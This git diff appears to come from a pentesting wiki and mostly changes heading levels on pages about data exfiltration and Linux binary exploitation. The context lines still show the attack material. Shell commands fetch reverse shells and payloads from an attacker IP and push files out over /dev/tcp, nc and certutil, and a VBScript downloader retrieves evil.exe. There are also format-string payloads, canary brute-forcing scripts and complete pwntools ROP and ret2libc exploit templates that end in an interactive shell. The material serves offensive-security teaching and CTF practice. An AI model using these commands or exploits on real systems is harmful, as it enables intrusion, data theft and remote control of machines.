index 657e64c0..7b509fb4 100644
--- a/exfiltration.md
+++ b/exfiltration.md
@@ -17,27 +17,25 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Exfiltration
+# Copy\&Paste Base64
-## Copy\&Paste Base64
-
-#### Linux
+### Linux
```bash
base64 -w0 #Encode file
base64 -d file #Decode file
```
-#### Windows
+### Windows
```
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
-## HTTP
+# HTTP
-#### Linux
+### Linux
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
@@ -46,7 +44,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
-#### Windows
+### Windows
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
@@ -63,11 +61,11 @@ Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
-### Upload files
+## Upload files
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
-### **HTTPS Server**
+## **HTTPS Server**
```python
# from https://gist.github.com/dergachev/7028596
@@ -79,25 +77,25 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous
# then in your browser, visit:
# https://localhost:443
-#### PYTHON 2
+### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
-####
+###
-#### PYTHON3
+### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
-####
+###
-#### USING FLASK
+### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@@ -107,26 +105,26 @@ def root():
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
-####
+###
```
-## FTP
+# FTP
-### FTP server (python)
+## FTP server (python)
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
-### FTP server (NodeJS)
+## FTP server (NodeJS)
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
-### FTP server (pure-ftp)
+## FTP server (pure-ftp)
```bash
apt-get update && apt-get install pure-ftp
@@ -146,7 +144,7 @@ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
-### **Windows** client
+## **Windows** client
```bash
#Work well with python. With pure-ftp use fusr:ftp
@@ -159,7 +157,7 @@ echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
-## SMB
+# SMB
Kali as server
@@ -197,7 +195,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
WindPS-2> cd new_disk:
```
-## SCP
+# SCP
The attacker has to have SSHd running.
@@ -205,23 +203,23 @@ The attacker has to have SSHd running.
scp @:/
```
-## NC
+# NC
```bash
nc -lvnp 4444 > new_file
nc -vn 4444 < exfil_file
```
-## /dev/tcp
+# /dev/tcp
-### Download file from victim
+## Download file from victim
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
-### Upload file to victim
+## Upload file to victim
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@@ -232,7 +230,7 @@ cat <&6 > file.txt
thanks to **@BinaryShadow\_**
-## **ICMP**
+# **ICMP**
```bash
#In order to exfiltrate the content of a file via pings you can do:
@@ -252,7 +250,7 @@ def process_packet(pkt):
sniff(iface="tun0", prn=process_packet)
```
-## **SMTP**
+# **SMTP**
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
@@ -260,7 +258,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
sudo python -m smtpd -n -c DebuggingServer :25
```
-## TFTP
+# TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation)
@@ -286,7 +284,7 @@ In **victim**, connect to the Kali server:
tftp -i get nc.exe
```
-## PHP
+# PHP
Download a file with a PHP oneliner:
@@ -294,13 +292,13 @@ Download a file with a PHP oneliner:
echo "" > down2.php
```
-## VBScript
+# VBScript
```bash
Attacker> python -m SimpleHTTPServer 80
```
-#### Victim
+### Victim
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
@@ -334,7 +332,7 @@ echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
-## Debug.exe
+# Debug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
@@ -352,7 +350,7 @@ wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
-## DNS
+# DNS
[https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md
index 4c544729..8275ce10 100644
--- a/exploiting/linux-exploiting-basic-esp/README.md
+++ b/exploiting/linux-exploiting-basic-esp/README.md
@@ -16,9 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Linux Exploiting (Basic) (SPA)
-### **ASLR**
+# **ASLR**
Aleatorización de direcciones
@@ -63,7 +62,7 @@ int i = 5;
**Sección STACK**: La pila (Argumentos pasados, cadenas de entorno (env), variables locales…)
-### **1.STACK OVERFLOWS**
+# **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
@@ -75,15 +74,15 @@ Para obtener la dirección de una función dentro de un programa se puede hacer:
objdump -d ./PROGRAMA | grep FUNCION
```
-### ROP
+# ROP
-#### Call to sys\_execve
+## Call to sys\_execve
{% content-ref url="rop-syscall-execv.md" %}
[rop-syscall-execv.md](rop-syscall-execv.md)
{% endcontent-ref %}
-### **2.SHELLCODE**
+# **2.SHELLCODE**
Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_”
@@ -219,7 +218,7 @@ En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la d
**Off-by-One Exploit**\
Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP.
-### **4. Métodos return to Libc**
+# **4. Métodos return to Libc**
Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar.
@@ -277,7 +276,7 @@ Esta shellcode se puede repetir indefinidamente en las partes de memoria a las q
(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib)
-### **5.Métodos complementarios**
+# **5.Métodos complementarios**
**Ret2Ret**
@@ -370,7 +369,7 @@ Este tipo de overflows no busca lograr escribir algo en el proceso del programa,
No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante.
-### **Format Strings**
+# **Format Strings**
In C **`printf`** is function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text.
@@ -395,7 +394,7 @@ AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
```
-#### \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table)
+## \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table)
This is the table that contains the **address** to the **external functions** used by the program.
@@ -420,7 +419,7 @@ Then, the **next time** a call is performed to that address the **function** is
You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`**
-#### **Exploit Flow**
+## **Exploit Flow**
As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in a executable section, but highly probable you won't be able to write a shellcode in a executable section.\
So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.
@@ -442,7 +441,7 @@ HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\
\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\`
-#### **Format String Exploit Template**
+## **Format String Exploit Template**
You an find a **template** to exploit the GOT using format-strings here:
@@ -450,7 +449,7 @@ You an find a **template** to exploit the GOT using format-strings here:
[format-strings-template.md](format-strings-template.md)
{% endcontent-ref %}
-#### **.fini\_array**
+## **.fini\_array**
Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**.
@@ -467,7 +466,7 @@ Contents of section .fini_array:
Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln.
-#### **Format Strings to Dump Content**
+## **Format Strings to Dump Content**
A format string can also be abused to **dump content** from the memory of the program.\
For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**:
@@ -486,7 +485,7 @@ So, **accessing** the **8th parameter** you can get the flag:
Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**!
-#### **DTOR**
+## **DTOR**
{% hint style="danger" %}
Nowadays is very **weird to find a binary with a dtor section**.
@@ -503,12 +502,12 @@ rabin -s /exec | grep “__DTOR”
Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it.
-#### **Format Strings to Buffer Overflows**
+## **Format Strings to Buffer Overflows**
Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\
For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow.
-#### **\_\_atexit Structures**
+## **\_\_atexit Structures**
{% hint style="danger" %}
Nowadays is very **weird to exploit this**.
@@ -519,7 +518,7 @@ If you can **modify** the **address** of any of these **functions** to point to
Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\
The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector.
-#### **setjmp() & longjmp()**
+## **setjmp() & longjmp()**
{% hint style="danger" %}
Nowadays is very **weird to exploit this**.
@@ -538,7 +537,7 @@ Each class has a **Vtable** which is an array of **pointers to methods**.
Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode.
-### **Medidas preventivas y evasiones**
+# **Medidas preventivas y evasiones**
**ASLR no tan aleatorio**
@@ -592,7 +591,7 @@ Si se usa la función execve() después de fork(), se sobreescribe el espacio y
**Relocation Read-Only (RELRO)**
-#### Relro
+## Relro
**Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro.
@@ -744,7 +743,7 @@ Memcheck\
RAD (Return Address Defender)\
Insure++
-### **8 Heap Overflows: Exploits básicos**
+# **8 Heap Overflows: Exploits básicos**
**Trozo asignado**
@@ -863,7 +862,7 @@ En caso de querer volver a usar uno se asignaría sin problemas. En caso de quer
Un puntero previamente liberado es usado de nuevo sin control.
-### **8 Heap Overflows: Exploits avanzados**
+# **8 Heap Overflows: Exploits avanzados**
Las técnicas de Unlink() y FrontLink() fueron eliminadas al modificar la función unlink().
@@ -1079,12 +1078,12 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
**objdump -p -/exec**\
**Info functions strncmp —>** Info de la función en gdb
-### Interesting courses
+# Interesting courses
* [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io)
* [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
-### **References**
+# **References**
* [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)
diff --git a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
index cfc07739..217bd3ab 100644
--- a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
+++ b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Bypassing Canary & PIE
-
**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
.png>)
@@ -28,13 +26,13 @@ Note that **`checksec`** might not find that a binary is protected by a canary i
However, you can manually notice this if you find that a value is saved in the stack at the begging of a function call and this value is checked before exiting.
{% endhint %}
-## Brute force Canary
+# Brute force Canary
The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.
Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**):
-### Example 1
+## Example 1
This example is implemented for 64bits but could be easily implemented for 32 bits.
@@ -77,7 +75,7 @@ base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
```
-### Example 2
+## Example 2
This is implemented for 32 bits, but this could be easily changed to 64bits.\
Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
@@ -123,7 +121,7 @@ canary = breakCanary()
log.info(f"The canary is: {canary}")
```
-## Print Canary
+# Print Canary
Another way to bypass the canary is to **print it**.\
Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
@@ -133,7 +131,7 @@ With this info the attacker can **craft and send a new attack** knowing the cana
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\
CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
-## PIE
+# PIE
In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
@@ -149,7 +147,7 @@ base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
```
-### Get base address
+## Get base address
The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
diff --git a/exploiting/linux-exploiting-basic-esp/format-strings-template.md b/exploiting/linux-exploiting-basic-esp/format-strings-template.md
index 2a96381b..3b6723de 100644
--- a/exploiting/linux-exploiting-basic-esp/format-strings-template.md
+++ b/exploiting/linux-exploiting-basic-esp/format-strings-template.md
@@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Format Strings Template
-
```python
from pwn import *
from time import sleep
-####################
-#### CONNECTION ####
-####################
+###################
+### CONNECTION ####
+###################
# Define how you want to exploit the binary
LOCAL = True
@@ -72,9 +70,9 @@ def connect_binary():
ROP_LOADED = ROP(elf)# Find ROP gadgets
-########################################
-#### Get format string configuration ###
-########################################
+#######################################
+### Get format string configuration ###
+#######################################
def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md
index 572f2bd7..dabe6275 100644
--- a/exploiting/linux-exploiting-basic-esp/fusion.md
+++ b/exploiting/linux-exploiting-basic-esp/fusion.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Fusion
-
-## Level00
+# Level00
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
@@ -52,7 +50,7 @@ r.send(buf)
r.interactive()
```
-## Level01
+# Level01
```python
from pwn import *
diff --git a/exploiting/linux-exploiting-basic-esp/ret2lib.md b/exploiting/linux-exploiting-basic-esp/ret2lib.md
index 88812480..844a1b61 100644
--- a/exploiting/linux-exploiting-basic-esp/ret2lib.md
+++ b/exploiting/linux-exploiting-basic-esp/ret2lib.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Ret2Lib
-
**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.**
-## If you are **inside** the **host**
+# If you are **inside** the **host**
-### You can find the **address of lib**c
+## You can find the **address of lib**c
```bash
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
@@ -35,19 +33,19 @@ If you want to check if the ASLR is changing the address of libc you can do:
for i in `seq 0 20`; do ldd | grep libc; done
```
-### Get offset of system function
+## Get offset of system function
```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```
-### Get offset of "/bin/sh"
+## Get offset of "/bin/sh"
```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```
-### /proc/\/maps
+## /proc/\/maps
If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
@@ -57,7 +55,7 @@ Here you can find **exactly where is the libc loaded** inside the process and **
In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
-### Using gdb-peda
+## Using gdb-peda
Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda:
@@ -67,7 +65,7 @@ p exit
find "/bin/sh"
```
-## Bypassing ASLR
+# Bypassing ASLR
You can try to bruteforce the abse address of libc.
@@ -75,7 +73,7 @@ You can try to bruteforce the abse address of libc.
for off in range(0xb7000000, 0xb8000000, 0x1000):
```
-## Code
+# Code
```python
from pwn import *
diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md
index b93f2c05..2aa4b39c 100644
--- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md
@@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# ROP - Leaking LIBC address
-
-## Quick Resume
+# Quick Resume
1. **Find** overflow **offset**
2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me))
4. With the library, **calculate the ROP and exploit it**
-## Other tutorials and binaries to practice
+# Other tutorials and binaries to practice
This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
-## Code
+# Code
Filename: `vuln.c`
@@ -51,7 +49,7 @@ int main() {
gcc -o vuln vuln.c -fno-stack-protector -no-pie
```
-## ROP - Leaking LIBC template
+# ROP - Leaking LIBC template
I'm going to use the code located here to make the exploit.\
Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
@@ -60,14 +58,14 @@ Download the exploit and place it in the same directory as the vulnerable binary
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
-## 1- Finding the offset
+# 1- Finding the offset
The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`):
```bash
-####################
-#### Find offset ###
-####################
+###################
+### Find offset ###
+###################
OFFSET = ""#"A"*72
if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue
@@ -93,7 +91,7 @@ After finding the offset (in this case 40) change the OFFSET variable inside the
Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF.
-## 2- Finding Gadgets
+# 2- Finding Gadgets
Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
@@ -114,7 +112,7 @@ The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
In this step you don't need to execute anything as everything will be found by pwntools during the execution.
-## 3- Finding LIBC library
+# 3- Finding LIBC library
Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
@@ -165,14 +163,14 @@ This way we have **tricked puts function** to **print** out the **address** in *
As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
But, in a remote exploit case I will explain here how can you find it:
-### 3.1- Searching for libc version (1)
+## 3.1- Searching for libc version (1)
You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
It will also allow you to download the discovered version of **libc**
.png>)
-### 3.2- Searching for libc version (2)
+## 3.2- Searching for libc version (2)
You can also do:
@@ -207,7 +205,7 @@ Getting libc6_2.23-0ubuntu10_amd64
Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
-### 3.3- Other functions to leak
+## 3.3- Other functions to leak
```python
puts
@@ -217,7 +215,7 @@ read
gets
```
-## 4- Finding based libc address & exploiting
+# 4- Finding based libc address & exploiting
At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
@@ -256,7 +254,7 @@ rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
p.clean()
p.sendline(rop2)
-##### Interact with the shell #####
+#### Interact with the shell #####
p.interactive() #Interact with the conenction
```
@@ -268,7 +266,7 @@ Finally, the **address of exit function** is **called** so the process **exists
.png>)
-## 4(2)- Using ONE\_GADGET
+# 4(2)- Using ONE\_GADGET
You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \
However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
@@ -280,7 +278,7 @@ ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100
```
-## EXPLOIT FILE
+# EXPLOIT FILE
You can find a template to exploit this vulnerability here:
@@ -288,9 +286,9 @@ You can find a template to exploit this vulnerability here:
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
-## Common problems
+# Common problems
-### MAIN\_PLT = elf.symbols\['main'] not found
+## MAIN\_PLT = elf.symbols\['main'] not found
If the "main" symbol does not exist. Then you can just where is the main code:
@@ -306,11 +304,11 @@ and set the address manually:
MAIN_PLT = 0x401080
```
-### Puts not found
+## Puts not found
If the binary is not using Puts you should check if it is using
-### `sh: 1: %s%s%s%s%s%s%s%s: not found`
+## `sh: 1: %s%s%s%s%s%s%s%s: not found`
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md
index 1508100c..628a39f0 100644
--- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# ROP - Leaking LIBC template
-
{% code title="template.py" %}
```python
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
-####################
-#### CONNECTION ####
-####################
+###################
+### CONNECTION ####
+###################
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
@@ -61,9 +59,9 @@ if GDB and not REMOTETTCP and not REMOTESSH:
-##########################
-##### OFFSET FINDER ######
-##########################
+#########################
+#### OFFSET FINDER ######
+#########################
OFFSET = b"" #b"A"*264
if OFFSET == b"":
@@ -79,9 +77,9 @@ if OFFSET == b"":
-#####################
-#### Find Gadgets ###
-#####################
+####################
+### Find Gadgets ###
+####################
try:
libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
@@ -99,9 +97,9 @@ log.info("pop rdi; ret gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET))
-#########################
-#### Find LIBC offset ###
-#########################
+########################
+### Find LIBC offset ###
+########################
def generate_payload_aligned(rop):
payload1 = OFFSET + rop
@@ -157,11 +155,11 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
-##############################
-##### FINAL EXPLOITATION #####
-##############################
+#############################
+#### FINAL EXPLOITATION #####
+#############################
-### Via One_gadget (https://github.com/david942j/one_gadget)
+## Via One_gadget (https://github.com/david942j/one_gadget)
# gem install one_gadget
def get_one_gadgets(libc):
import string, subprocess
@@ -183,7 +181,7 @@ if USE_ONE_GADGET:
if one_gadgets:
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
-### Normal/Long exploitation
+## Normal/Long exploitation
if not rop2:
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
@@ -205,9 +203,9 @@ P.interactive() #Interact with your shell :)
```
{% endcode %}
-## Common problems
+# Common problems
-### MAIN\_PLT = elf.symbols\['main'] not found
+## MAIN\_PLT = elf.symbols\['main'] not found
If the "main" symbol does not exist. Then you can just where is the main code:
@@ -223,11 +221,11 @@ and set the address manually:
MAIN_PLT = 0x401080
```
-### Puts not found
+## Puts not found
If the binary is not using Puts you should check if it is using
-### `sh: 1: %s%s%s%s%s%s%s%s: not found`
+## `sh: 1: %s%s%s%s%s%s%s%s: not found`
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
diff --git a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
index 848d9a95..8df622f6 100644
--- a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# ROP - call sys\_execve
-
In order to prepare the call for the **syscall** it's needed the following configuration:
* `rax: 59 Specify sys_execve`
@@ -28,7 +26,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack).
-## Control the registers
+# Control the registers
Let's start by finding **how to control those registers**:
@@ -42,9 +40,9 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
With these addresses it's possible to **write the content in the stack and load it into the registers**.
-## Write string
+# Write string
-### Writable memory
+## Writable memory
Frist you need to find a writable place in the memory
@@ -57,7 +55,7 @@ Start End Offset Perm Path
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```
-### Write String
+## Write String
Then you need to find a way to write arbitrary content in this address
@@ -66,7 +64,7 @@ ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
-#### 32 bits
+### 32 bits
```python
'''
@@ -90,7 +88,7 @@ rop += p32(0x6b6000 + 4)
rop += writeGadget
```
-#### 64 bits
+### 64 bits
```python
'''
@@ -108,7 +106,7 @@ rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
-## Example
+# Example
```python
from pwn import *
@@ -177,7 +175,7 @@ target.sendline(payload)
target.interactive()
```
-## References
+# References
